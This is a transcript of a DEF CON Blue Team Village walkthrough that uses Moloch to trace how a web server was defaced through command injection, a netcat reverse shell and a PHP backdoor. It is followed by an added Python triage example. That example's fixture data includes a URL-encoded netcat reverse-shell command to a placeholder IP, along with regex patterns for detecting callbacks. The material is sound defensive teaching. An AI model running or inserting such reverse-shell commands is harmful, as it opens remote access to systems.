Welcome back, everybody, to DEF CON 28 Safe Mode. Continuing on with the Blue Team Village OpenSOC CTF walkthrough, we're going to be talking about Moloch today, and we have Bashar Shama here to give us a quick discussion and a walkthrough on the tool. Welcome, Bashar.

Thank you. Hello, everyone. I am Bashar, and I'm going to go over how we're going to use Moloch tomorrow during the CTF. I was actually introduced to Moloch two years ago, playing the same exact CTF that you're going to play tomorrow. I played it two years ago and I really, really fell in love with Moloch. So, since then, I started playing with it, tinkering with it, just using it as much as I can, and I still use it today. The goal today is to really prepare you on how to use Moloch in the CTF tomorrow. So, we will have time for questions at the end. Please post any questions that you have to the Text Workshops Track 1 channel in the Discord. The moderators will monitor your questions and we'll kind of ask them towards the end of the session. So, keep your questions coming. We'll have some time at the end to go over some questions. So, let's go ahead and get started.

So, a very brief intro on what Moloch is. It's pretty much a free, open source tool. It's really a network analysis tool that you can use to analyze a large volume of packet data, or PCAPs. The simplest way to think about it is, if you've ever used Wireshark, it's like a Wireshark front end with a huge database back end. So, you can search tons and tons of PCAP data, gigs of it, hundreds of gigs of PCAPs, very easily, very quickly. That's a very, very, very 10,000-foot overview of Moloch. For our purpose here and for the CTF tomorrow, what I have done is I actually have Moloch set up and I got about four gigs of data as a sample from the network forensics training of FIRST 2015.
I know these PCAPs, and I pretty much loaded them into Moloch to kind of show you how we can use this tool to do our investigation and answer the questions during the CTF tomorrow.

So, our scenario for today is: you're part of the security team and you received a call saying, hey, around 1 p.m. today, or not today, 1 p.m. on March 12th, 2015, our main company site has been defaced. Somebody has changed the way our website looks. All we know is we have this image file showing a frog on our main site, and we don't know how this happened. Can you please help us? And all you know is you have access to packet capture. You have packet capture, and that's what you do, and you have our system, Moloch. So, let's walk right through it.

So, if you have never seen Moloch before, this is what it looks like. When you land, or you log in, you will land pretty much in the Sessions tab, and that's where you're gonna probably spend most of your time tomorrow. Usually, I like to go and just do the drop-down here on the time and the date, and I will do all the time, all day, just to have an understanding of the whole incident. For the purpose of tomorrow, again, it's gonna be a very specific time period. But this is where I would start, and let's go ahead and deep dive into the investigation and how we can use Moloch.

So, the first piece of information we know is the date of the incident. So, we know it's in 2015. So, as you can see, Moloch gives us this ability to just click through and decide on the dates that we wanna investigate. I'm gonna do the 12th. So, we have our date here. That's gonna be our starting date. And then I'm gonna just copy it, paste it here, and I'm gonna change this to 13, which will show us here now that we're looking at a one-day time range. So, I have my time range set up. I'm gonna go search. And now I can narrow it down to that 24-hour period to kind of figure out what happened during that day.
Now, the other piece of information that we were given was that it was our main company's website. So, how can I search for that? Probably I wanna look for our host name. So, what I can do is I can type host, and Moloch will automatically parse the different fields based on the protocols that exist in the packet. So, if it was HTTP traffic, then Moloch will say, okay, well, this is an HTTP host. If it's an email, then it's an email host name, and so on. In my case, because I wanna see everything, all kinds of hosts, I can just say host, and to specify what I'm looking for in Moloch, I would just say equal, equal. So, equal, equal means show me everything that matches exactly our host name on AD.asee, okay? That's the first bit of it, and I can run that. I also know, since it's our website, I wanna say, well, it's a website that's gonna be running on two ports, for example. So, to kind of add more queries into Moloch, what you need to do is you just do two ampersands as an AND, and I'm gonna open parentheses and add the ports that we need. So, port equals 80, just like we did before, and port equals 443, which we know are both HTTP ports. Now, before we go any further, under ports I can specify I want it to be a destination port, or a source port, and so on. Just to keep it general so we can see everything here, I'm just gonna say, okay, these ports, this host name, and let's see what we find. And I'm gonna stop something, of course. Oh, I'm saying AND here, and that should be OR. So, it's either port 80 or port 443. So in that case, I just do two pipes and run that. And now I'm saying, okay, show me everything for this host on port 80 and port 443. And now I can see the traffic. So, let's go and dive deeper. In this traffic, I can see all kinds of requests, and let's just open something very randomly. Let's open up this request, and I see it's a GET request.
And before we go down, let's spend some time here. So, I just see that Moloch will parse all the fields in the packet. So, I can click on any of these and I can say, okay, well, what protocol did it come from? Which IP, which ports? If it's an HTTP packet, then it will also parse the method, the status code, all of these things; it will also parse the user agents. Let's say I'm interested in knowing all the user agents that appeared on that specific day, that visited our website. I can easily click on user agents and I can say, okay, export unique user agents with counts. Once I click that, I will see a new page showing me the unique user agents and how many times we've seen each one on that specific day. So, we only see two different user agents, nothing abnormal, nothing suspicious. So, nothing to worry about here. We scroll a bit now, and we can actually see the actual request in raw, the raw request. So, I can see which host they're requesting, the URI they're going after, and so on. Because I know we had an incident and I know the website has been defaced, the attacker must have sent some kind of data to our website. So, most likely they will not be doing a GET request. When we see GET, it's just pulling data from our website. They're gonna be posting or sending some kind of data. So, let's exclude this. So, I'm gonna click GET, and we don't want GET anymore. So, let's say not GET, and that will actually add that to our query. And hit search, see what we find. So, now we went down to only 12 entries. Okay, that's much easier to kind of go through and investigate. Again, we're not sure what happened, but one thing I can sort by is time to kind of understand the timeline of these different requests and the events. And let's just open one at random. So, again, same kind of fields; it parses this whole request and so on. So, now it's a POST request and it's just requesting index.php.
And I see a test and sleep. I'm not sure what all this stuff really means. And I also see this gibberish stuff. What is this? I don't understand. So, if you look at the header, which Moloch has already parsed for you, sometimes it's actually encoded with gzip. Gzip is just a method of compression that web browsers use to compress the data to transfer the least amount of traffic. So, the nice thing with Moloch is I can just click on compress, and now it will automatically decode this packet for us. And now I can easily read it and see, oh, okay. This is what loaded. This is what the page is showing. And from what we see here, nothing of interest yet. Okay, that was useful. But let's keep going. Let's find out what happened.

So, another request, and I see this, but this looks like an IP address. But what is all this? I don't know. Well, what we can do is Moloch has CyberChef built in. Well, CyberChef is a separate open source project, but we can actually just go and open CyberChef, and you can load it outside of Moloch. There we go. And you can just load it outside of Moloch and you can do your decoding. But let's get back here. The beauty of this is when we do it from Moloch, it will automatically take the packet data and put it in for us. So, what is CyberChef? It's pretty much a tool, a web GUI that you can use to do different decoding of different languages, decoding mechanisms, and so on. So, in this case, it's taking the hex code and just decoding it. And while we're looking at this, I can see these percentage signs. Percentage sign means it's a URL encoding kind of thing. So, I can easily just drag the URL decode, and now I can see the decoded message here. And I can see, oh, it's trying to ping this IP address, which is the same IP that's trying to visit. Okay, this is interesting. I'm not sure if they were actually able to ping, but it looks like this IP is trying to do something here.
Let's keep going, see what else we can find. Next packet, same thing, test. Okay, nothing here. Next packet, and so on. Oh, there's an nc. Okay, what is this? Wait a second. Let's pull it up again in CyberChef. Do the same method, decode the URL. And now we see an nc, an IP address, and a port. So nc stands for Netcat, which is a utility attackers can use to have a server connect back to them and get a shell on the box. So what this is saying is, okay, connect back to my IP over this port. So what this means, if this actually succeeded, is that our server connected back to this IP address. Okay, well, let's see if this actually happened. I'm gonna take that port, I'm gonna clean all this up, and then I'm gonna add the IP address. It's not gonna be the source. And port equals the port that we're looking for, and search. And we have traffic. Uh-oh, this is not good. Looks like our box, which is the source here, connected back to the server over this port. We can see how many packets and the amount of data that was sent back and forth. So immediately I would say, okay, well, this first connection has the highest number of packets, so it might have something interesting in it. So let me open it up, scroll down, and we can actually see the whole conversation back and forth now. Well, it looks like the attacker ran a command, which is id, which is equal to whoami on Windows, to figure out who they are running as on this box, and they run as Apache. Then they try to figure out which folder they're in, and they try to access file systems. Okay, this is not good. And then they did this cat index.php, which looks like it's our website. They're looking into what's inside our main file and so on. And, okay, what is all this? Oh, and then I see another netcat command here, saving the connection as a cm0 PHP file on our box locally. So I really, I'm interested to know what this is, but let's keep going. Let's see what else they did on this box.
And if we get here, they actually did it for us. They did a cat on this file that they created. Okay, when they did that, we can see, oh, it's a PHP backdoor. This is not good. So they used a PHP backdoor on our site. So how am I gonna now figure out what they did? I know, because of how backdoors work, they have to visit this PHP file explicitly to kind of load the command they wanna run. So what I can say to Moloch is, well, show me all the URIs. So when we say URI, pretty much everything after the domain would be a URI; that's what's in front here. That's a URI. So I wanna say, show me everything that has this in it. And since I can't just do that directly, what I do in Moloch is I just use wildcards at the beginning, so I don't care what's before this, and at the end, meaning I don't care what's after it. Just show me anything that has this string in the URI. And when I search it, now here we can see all these URIs with all these different links in them. What are they trying to do? Well, how can I get all this put in one nice place? I can just click above and say export unique URI with counts. Now Moloch will take this for us and tell us, okay, well, this command was run five times, this command was run three times, and so on. So now I kind of know which commands they ran, because I can see it's command equals cat, command equals ls, or whatever they're trying to do. And I kind of see here there's a JPEG file as well. Okay. So this is how they probably got that JPEG file, or the image of the frog, onto our website. So let's find out how they did this. So back here, and let's do, instead of this, we are looking for that specific JPEG file. So I'm gonna do wildcard and show me anything that has JPEG in it. Go through it, and it's gonna show me all the stuff. I'm gonna say probably it's gonna be the biggest file.
So I'm gonna sort by the size of the data, and this is the biggest file that we have when it's loading. And here I can see it's an image file, but I'm not sure what it looks like. So what I can do in Moloch is I can just click on show images and files, and it will actually render it for us right here in the browser. Now, let's say, you know, I'm not comfortable with doing this, or I want to dig in deeper to it, or I want to understand what actually happened using Wireshark because I've never used Moloch before. At any session, at any point, you can always just click on download PCAP, and it will save the PCAP for you. So you can open it up in Wireshark and, you know, do your analysis manually if you'd like to. Pretty much that's how they got the file, and that's how they defaced our website, and it was through a backdoor. If we have time, I think we have another... I think that's pretty much it. Okay, so would that be insane? I think that's the highlight of Moloch and how to use it. I want to keep some time for questions. Please let me know what kind of questions you've got. I'm also going to be on Discord and on Twitter if you need anything else, but I'm going to be here for any questions that you guys have.

Thank you, Bashar. I went ahead and put a note in the text window under the Workshop Track 1 with a link over to the Recon InfoSec OpenSOC Moloch Discord channel. So definitely check that out. Obviously hit Bashar up on Twitter or Discord, but we're trying to help everybody kind of connect with the right people here so you can get the help you need. Perfect. Thanks a lot, Bashar. I appreciate it. Thank you. I appreciate it. Thank you. Take care.
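As an added example (not part of the talk and not Moloch's own code), the triage flow from the walkthrough reduced to plain Python over constructed session records: the host and port filter with GET excluded, the hex-then-URL decode of the payloads, flagging the ping and netcat callback strings, and the "export unique URI with counts" view. The hostnames, the 192.0.2.x addresses and the backdoor.php name are placeholders.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed session records (hypothetical, not from the CTF PCAPs) shaped like
# Moloch's http.method, host, dst port and http.uri fields. backdoor.php is a placeholder.
HEX_PING = "636d643d70696e672532302d63253230312532303139322e302e322e3130"  # hex of a URL-encoded ping
SESSIONS = [
    ("GET",  "www.example.test",  80,  "/index.php"),
    ("POST", "www.example.test",  80,  "/index.php?cmd=test%3Bsleep%205"),
    ("POST", "www.example.test",  80,  "/index.php?" + HEX_PING),
    ("POST", "www.example.test",  443, "/index.php?cmd=nc%20192.0.2.10%204444%20-e%20/bin/sh"),
    ("GET",  "www.example.test",  80,  "/backdoor.php?cmd=cat%20index.php"),
    ("GET",  "www.example.test",  80,  "/backdoor.php?cmd=cat%20index.php"),
    ("GET",  "www.example.test",  80,  "/backdoor.php?cmd=ls"),
    ("GET",  "mail.example.test", 25,  "/"),
]

HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2})+$")
CALLBACK_RE = re.compile(r"\bnc\b[^;&|]*?(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})")
PING_RE = re.compile(r"\bping\b[^;&|]*?(\d{1,3}(?:\.\d{1,3}){3})")


def filter_sessions(sessions, host, ports, exclude_method=None):
    """host == <host> && (port == 80 || port == 443), optionally && http.method != X."""
    return [s for s in sessions
            if s[1] == host and s[2] in ports
            and (exclude_method is None or s[0] != exclude_method)]


def decode_payload(value):
    """CyberChef steps from the talk: From Hex (if the whole string is hex), then URL Decode until stable."""
    if HEX_RE.match(value):
        value = bytes.fromhex(value).decode("utf-8", "replace")
    while (decoded := unquote(value)) != value:  # loop handles double encoding
        value = decoded
    return value


def classify(uri):
    """Decode the query string and tag what an analyst would flag in it."""
    payload = decode_payload(uri.split("?", 1)[1]) if "?" in uri else ""
    tags = []
    if m := CALLBACK_RE.search(payload):
        tags.append(f"netcat callback to {m.group(1)}:{m.group(2)}")
    if m := PING_RE.search(payload):
        tags.append(f"ping probe to {m.group(1)}")
    return payload, tags


def unique_uri_counts(sessions, needle):
    """'Export unique URI with counts' for URIs containing *needle*."""
    return Counter(decode_payload(s[3]) for s in sessions if needle in s[3])
```

Running `classify` over `filter_sessions(SESSIONS, "www.example.test", {80, 443}, exclude_method="GET")` surfaces the same three POSTs the talk walks through, and `unique_uri_counts(SESSIONS, "backdoor.php")` gives the per-command tally.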